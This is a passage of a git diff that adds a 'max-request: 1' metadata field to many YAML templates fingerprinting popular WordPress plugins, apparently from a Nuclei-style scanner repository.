   metadata:
+    max-request: 1
     plugin_namespace: formidable
     wpscan: https://wpscan.com/plugin/formidable
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml
index 980265f531..91c89d0ad8 100644
--- a/http/technologies/wordpress/plugins/forminator.yaml
+++ b/http/technologies/wordpress/plugins/forminator.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/forminator/
   metadata:
+    max-request: 1
     plugin_namespace: forminator
     wpscan: https://wpscan.com/plugin/forminator
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml
index daf205789d..539d9f7cec 100644
--- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml
+++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/ga-google-analytics/
   metadata:
+    max-request: 1
     plugin_namespace: ga-google-analytics
     wpscan: https://wpscan.com/plugin/ga-google-analytics
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml
index 22bfa3ffe2..f4123bb594 100644
--- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml
+++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/gdpr-cookie-compliance/
   metadata:
+    max-request: 1
     plugin_namespace: gdpr-cookie-compliance
     wpscan: https://wpscan.com/plugin/gdpr-cookie-compliance
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml
index 7ed171d662..254f916291 100644
--- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml
+++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/google-analytics-dashboard-for-wp/
   metadata:
+    max-request: 1
     plugin_namespace: google-analytics-dashboard-for-wp
     wpscan: https://wpscan.com/plugin/google-analytics-dashboard-for-wp
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml
index ad238445fc..8074ac337e 100644
--- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml
+++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/google-analytics-for-wordpress/
   metadata:
+    max-request: 1
     plugin_namespace: google-analytics-for-wordpress
     wpscan: https://wpscan.com/plugin/google-analytics-for-wordpress
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml
index 7161671960..b9de0ee313 100644
--- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml
+++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/google-listings-and-ads/
   metadata:
+    max-request: 1
     plugin_namespace: google-listings-and-ads
     wpscan: https://wpscan.com/plugin/google-listings-and-ads
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml
index 2678f603c6..7b0f188ff7 100644
--- a/http/technologies/wordpress/plugins/google-site-kit.yaml
+++ b/http/technologies/wordpress/plugins/google-site-kit.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/google-site-kit/
   metadata:
+    max-request: 1
     plugin_namespace: google-site-kit
     wpscan: https://wpscan.com/plugin/google-site-kit
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml
index 20d947a5d1..898e4de56d 100644
--- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml
+++ b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/google-sitemap-generator/
   metadata:
+    max-request: 1
     plugin_namespace: google-sitemap-generator
     wpscan: https://wpscan.com/plugin/google-sitemap-generator
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml
index 22ee97b51f..4a76856a69 100644
--- a/http/technologies/wordpress/plugins/gtranslate.yaml
+++ b/http/technologies/wordpress/plugins/gtranslate.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/gtranslate/
   metadata:
+    max-request: 1
     plugin_namespace: gtranslate
     wpscan: https://wpscan.com/plugin/gtranslate
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml
index 3f4c6c8936..b321ca63eb 100644
--- a/http/technologies/wordpress/plugins/gutenberg.yaml
+++ b/http/technologies/wordpress/plugins/gutenberg.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/gutenberg/
   metadata:
+    max-request: 1
     plugin_namespace: gutenberg
     wpscan: https://wpscan.com/plugin/gutenberg
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml
index fa1bb64115..2b42c9f80c 100644
--- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml
+++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/happy-elementor-addons/
   metadata:
+    max-request: 1
     plugin_namespace: happy-elementor-addons
     wpscan: https://wpscan.com/plugin/happy-elementor-addons
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml
index da63d1cbf6..dbea07a6da 100644
--- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml
+++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/header-footer-code-manager/
   metadata:
+    max-request: 1
     plugin_namespace: header-footer-code-manager
     wpscan: https://wpscan.com/plugin/header-footer-code-manager
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml
index f94e7f6494..17a8f220cf 100644
--- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml
+++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/header-footer-elementor/
   metadata:
+    max-request: 1
     plugin_namespace: header-footer-elementor
     wpscan: https://wpscan.com/plugin/header-footer-elementor
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml
index 95d2aa5f16..956a08b32d 100644
--- a/http/technologies/wordpress/plugins/header-footer.yaml
+++ b/http/technologies/wordpress/plugins/header-footer.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/header-footer/
   metadata:
+    max-request: 1
     plugin_namespace: header-footer
     wpscan: https://wpscan.com/plugin/header-footer
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/health-check.yaml b/http/technologies/wordpress/plugins/health-check.yaml
index af8193b875..5a570b9077 100644
--- a/http/technologies/wordpress/plugins/health-check.yaml
+++ b/http/technologies/wordpress/plugins/health-check.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/health-check/
   metadata:
+    max-request: 1
     plugin_namespace: health-check
     wpscan: https://wpscan.com/plugin/health-check
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml
index 8d7e45818b..4ecac0cd92 100644
--- a/http/technologies/wordpress/plugins/hello-dolly.yaml
+++ b/http/technologies/wordpress/plugins/hello-dolly.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/hello-dolly/
   metadata:
+    max-request: 1
     plugin_namespace: hello-dolly
     wpscan: https://wpscan.com/plugin/hello-dolly
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml
index ed3967db7b..e50f58cef8 100644
--- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml
+++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/host-webfonts-local/
   metadata:
+    max-request: 1
     plugin_namespace: host-webfonts-local
     wpscan: https://wpscan.com/plugin/host-webfonts-local
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml
index 2ff5adba86..031bb48563 100644
--- a/http/technologies/wordpress/plugins/imagify.yaml
+++ b/http/technologies/wordpress/plugins/imagify.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/imagify/
   metadata:
+    max-request: 1
     plugin_namespace: imagify
     wpscan: https://wpscan.com/plugin/imagify
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/imsanity.yaml b/http/technologies/wordpress/plugins/imsanity.yaml
index 9099f3c0a5..3cdcf3da93 100644
--- a/http/technologies/wordpress/plugins/imsanity.yaml
+++ b/http/technologies/wordpress/plugins/imsanity.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/imsanity/
   metadata:
+    max-request: 1
     plugin_namespace: imsanity
     wpscan: https://wpscan.com/plugin/imsanity
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml
index 1ee0e67542..c222bc9d4a 100644
--- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml
+++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/insert-headers-and-footers/
   metadata:
+    max-request: 1
     plugin_namespace: insert-headers-and-footers
     wpscan: https://wpscan.com/plugin/insert-headers-and-footers
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml
index 1778552d75..9c6e3e6d2e 100644
--- a/http/technologies/wordpress/plugins/instagram-feed.yaml
+++ b/http/technologies/wordpress/plugins/instagram-feed.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/instagram-feed/
   metadata:
+    max-request: 1
     plugin_namespace: instagram-feed
     wpscan: https://wpscan.com/plugin/instagram-feed
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml
index 7ba81036cf..66b7d6a363 100644
--- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml
+++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/intuitive-custom-post-order/
   metadata:
+    max-request: 1
     plugin_namespace: intuitive-custom-post-order
     wpscan: https://wpscan.com/plugin/intuitive-custom-post-order
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/iwp-client.yaml b/http/technologies/wordpress/plugins/iwp-client.yaml
index 24fc3e3295..a36016562d 100644
--- a/http/technologies/wordpress/plugins/iwp-client.yaml
+++ b/http/technologies/wordpress/plugins/iwp-client.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/iwp-client/
   metadata:
+    max-request: 1
     plugin_namespace: iwp-client
     wpscan: https://wpscan.com/plugin/iwp-client
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/jetpack-boost.yaml b/http/technologies/wordpress/plugins/jetpack-boost.yaml
index 3e89505574..8033aacbc6 100644
--- a/http/technologies/wordpress/plugins/jetpack-boost.yaml
+++ b/http/technologies/wordpress/plugins/jetpack-boost.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/jetpack-boost/
   metadata:
+    max-request: 1
     plugin_namespace: jetpack-boost
     wpscan: https://wpscan.com/plugin/jetpack-boost
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml
index e701e365ba..e4017b1a0a 100644
--- a/http/technologies/wordpress/plugins/jetpack.yaml
+++ b/http/technologies/wordpress/plugins/jetpack.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/jetpack/
   metadata:
+    max-request: 1
     plugin_namespace: jetpack
     wpscan: https://wpscan.com/plugin/jetpack
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml
index c0cc5400a8..53d6d393bd 100644
--- a/http/technologies/wordpress/plugins/kadence-blocks.yaml
+++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/kadence-blocks/
   metadata:
+    max-request: 1
     plugin_namespace: kadence-blocks
     wpscan: https://wpscan.com/plugin/kadence-blocks
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml
index 22687bcffe..c286e9a14f 100644
--- a/http/technologies/wordpress/plugins/kirki.yaml
+++ b/http/technologies/wordpress/plugins/kirki.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/kirki/
   metadata:
+    max-request: 1
     plugin_namespace: kirki
     wpscan: https://wpscan.com/plugin/kirki
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml
index b69d3d5bfe..364e3cd71e 100644
--- a/http/technologies/wordpress/plugins/leadin.yaml
+++ b/http/technologies/wordpress/plugins/leadin.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/leadin/
   metadata:
+    max-request: 1
     plugin_namespace: leadin
     wpscan: https://wpscan.com/plugin/leadin
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml
index 7975a57702..4fcccbfc33 100644
--- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml
+++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/limit-login-attempts-reloaded/
   metadata:
+    max-request: 1
     plugin_namespace: limit-login-attempts-reloaded
     wpscan: https://wpscan.com/plugin/limit-login-attempts-reloaded
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml
index ff4cef94d7..3fbc714d3b 100644
--- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml
+++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/limit-login-attempts/
   metadata:
+    max-request: 1
     plugin_namespace: limit-login-attempts
     wpscan: https://wpscan.com/plugin/limit-login-attempts
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml
index a8903697b0..c49b506979 100644
--- a/http/technologies/wordpress/plugins/litespeed-cache.yaml
+++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/litespeed-cache/
   metadata:
+    max-request: 1
     plugin_namespace: litespeed-cache
     wpscan: https://wpscan.com/plugin/litespeed-cache
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml
index 3f141c4476..dfcaf6f71b 100644
--- a/http/technologies/wordpress/plugins/loco-translate.yaml
+++ b/http/technologies/wordpress/plugins/loco-translate.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/loco-translate/
   metadata:
+    max-request: 1
     plugin_namespace: loco-translate
     wpscan: https://wpscan.com/plugin/loco-translate
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml
index 5355e988a2..61be246fee 100644
--- a/http/technologies/wordpress/plugins/loginizer.yaml
+++ b/http/technologies/wordpress/plugins/loginizer.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/loginizer/
   metadata:
+    max-request: 1
     plugin_namespace: loginizer
     wpscan: https://wpscan.com/plugin/loginizer
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml
index 53d409fb68..50d2e6630b 100644
--- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml
+++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/mailchimp-for-woocommerce/
   metadata:
+    max-request: 1
     plugin_namespace: mailchimp-for-woocommerce
     wpscan: https://wpscan.com/plugin/mailchimp-for-woocommerce
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml
index 0e908a9580..8d71f7bde9 100644
--- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml
+++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/mailchimp-for-wp/
   metadata:
+    max-request: 1
     plugin_namespace: mailchimp-for-wp
     wpscan: https://wpscan.com/plugin/mailchimp-for-wp
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml
index aeb1875c57..5e1f97086e 100644
--- a/http/technologies/wordpress/plugins/mailpoet.yaml
+++ b/http/technologies/wordpress/plugins/mailpoet.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/mailpoet/
   metadata:
+    max-request: 1
     plugin_namespace: mailpoet
     wpscan: https://wpscan.com/plugin/mailpoet
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml
index 7c15702305..d87d456a8c 100644
--- a/http/technologies/wordpress/plugins/maintenance.yaml
+++ b/http/technologies/wordpress/plugins/maintenance.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/maintenance/
   metadata:
+    max-request: 1
     plugin_namespace: maintenance
     wpscan: https://wpscan.com/plugin/maintenance
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml
index 5ce87e6c71..aa9153241e 100644
--- a/http/technologies/wordpress/plugins/mainwp-child.yaml
+++ b/http/technologies/wordpress/plugins/mainwp-child.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/mainwp-child/
   metadata:
+    max-request: 1
     plugin_namespace: mainwp-child
     wpscan: https://wpscan.com/plugin/mainwp-child
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml
index c342e6b45a..09641796a3 100644
--- a/http/technologies/wordpress/plugins/malcare-security.yaml
+++ b/http/technologies/wordpress/plugins/malcare-security.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/malcare-security/
   metadata:
+    max-request: 1
     plugin_namespace: malcare-security
     wpscan: https://wpscan.com/plugin/malcare-security
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml
index e95041f555..28b70d09bf 100644
--- a/http/technologies/wordpress/plugins/megamenu.yaml
+++ b/http/technologies/wordpress/plugins/megamenu.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/megamenu/
   metadata:
+    max-request: 1
     plugin_namespace: megamenu
     wpscan: https://wpscan.com/plugin/megamenu
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/members.yaml b/http/technologies/wordpress/plugins/members.yaml
index 879a0d1c12..b43c10ed7a 100644
--- a/http/technologies/wordpress/plugins/members.yaml
+++ b/http/technologies/wordpress/plugins/members.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/members/
   metadata:
+    max-request: 1
     plugin_namespace: members
     wpscan: https://wpscan.com/plugin/members
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml
index 985f5d373a..eb7e78bc7f 100644
--- a/http/technologies/wordpress/plugins/meta-box.yaml
+++ b/http/technologies/wordpress/plugins/meta-box.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/meta-box/
   metadata:
+    max-request: 1
     plugin_namespace: meta-box
     wpscan: https://wpscan.com/plugin/meta-box
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml
index bbc305b8de..3da2ea50e1 100644
--- a/http/technologies/wordpress/plugins/ml-slider.yaml
+++ b/http/technologies/wordpress/plugins/ml-slider.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/ml-slider/
   metadata:
+    max-request: 1
     plugin_namespace: ml-slider
     wpscan: https://wpscan.com/plugin/ml-slider
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml
index 7e3e4e2d7e..7a58c58f63 100644
--- a/http/technologies/wordpress/plugins/newsletter.yaml
+++ b/http/technologies/wordpress/plugins/newsletter.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/newsletter/
   metadata:
+    max-request: 1
     plugin_namespace: newsletter
     wpscan: https://wpscan.com/plugin/newsletter
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml
index 17ea142c46..5f99b8cac8 100644
--- a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml
+++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/nextend-facebook-connect/
   metadata:
+    max-request: 1
     plugin_namespace: nextend-facebook-connect
     wpscan: https://wpscan.com/plugin/nextend-facebook-connect
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml
index 953e4ab3d8..b08876df04 100644
--- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml
+++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/nextgen-gallery/
   metadata:
+    max-request: 1
     plugin_namespace: nextgen-gallery
     wpscan: https://wpscan.com/plugin/nextgen-gallery
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml
index 92107fa69c..3f68dffe06 100644
--- a/http/technologies/wordpress/plugins/ninja-forms.yaml
+++ b/http/technologies/wordpress/plugins/ninja-forms.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/ninja-forms/
   metadata:
+    max-request: 1
     plugin_namespace: ninja-forms
     wpscan: https://wpscan.com/plugin/ninja-forms
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml
index 5e1fe4ef5c..34f9bde1d6 100644
--- a/http/technologies/wordpress/plugins/ocean-extra.yaml
+++ b/http/technologies/wordpress/plugins/ocean-extra.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/ocean-extra/
   metadata:
+    max-request: 1
     plugin_namespace: ocean-extra
     wpscan: https://wpscan.com/plugin/ocean-extra
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml
index 74fb3e6010..d9f645328f 100644
--- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml
+++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/official-facebook-pixel/
   metadata:
+    max-request: 1
     plugin_namespace: official-facebook-pixel
     wpscan: https://wpscan.com/plugin/official-facebook-pixel
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml
index b9f70ba555..8a1196fc9f 100644
--- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml
+++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/one-click-demo-import/
   metadata:
+    max-request: 1
     plugin_namespace: one-click-demo-import
     wpscan: https://wpscan.com/plugin/one-click-demo-import
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml
index 6486c02c9a..05025452b7 100644
--- a/http/technologies/wordpress/plugins/optinmonster.yaml
+++ b/http/technologies/wordpress/plugins/optinmonster.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/optinmonster/
   metadata:
+    max-request: 1
     plugin_namespace: optinmonster
     wpscan: https://wpscan.com/plugin/optinmonster
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml
index 81f58198d3..1db1b57708 100644
--- a/http/technologies/wordpress/plugins/otter-blocks.yaml
+++ b/http/technologies/wordpress/plugins/otter-blocks.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/otter-blocks/
   metadata:
+    max-request: 1
     plugin_namespace: otter-blocks
     wpscan: https://wpscan.com/plugin/otter-blocks
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml
index 3743307dbc..dafe6974f6 100644
--- a/http/technologies/wordpress/plugins/password-protected.yaml
+++ b/http/technologies/wordpress/plugins/password-protected.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/password-protected/
   metadata:
+    max-request: 1
     plugin_namespace: password-protected
     wpscan: https://wpscan.com/plugin/password-protected
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml
index a4c6980041..ba05fb1e16 100644
--- a/http/technologies/wordpress/plugins/pdf-embedder.yaml
+++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/pdf-embedder/
   metadata:
+    max-request: 1
     plugin_namespace: pdf-embedder
     wpscan: https://wpscan.com/plugin/pdf-embedder
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml
index e085f30e5a..a038adac53 100644
--- a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml
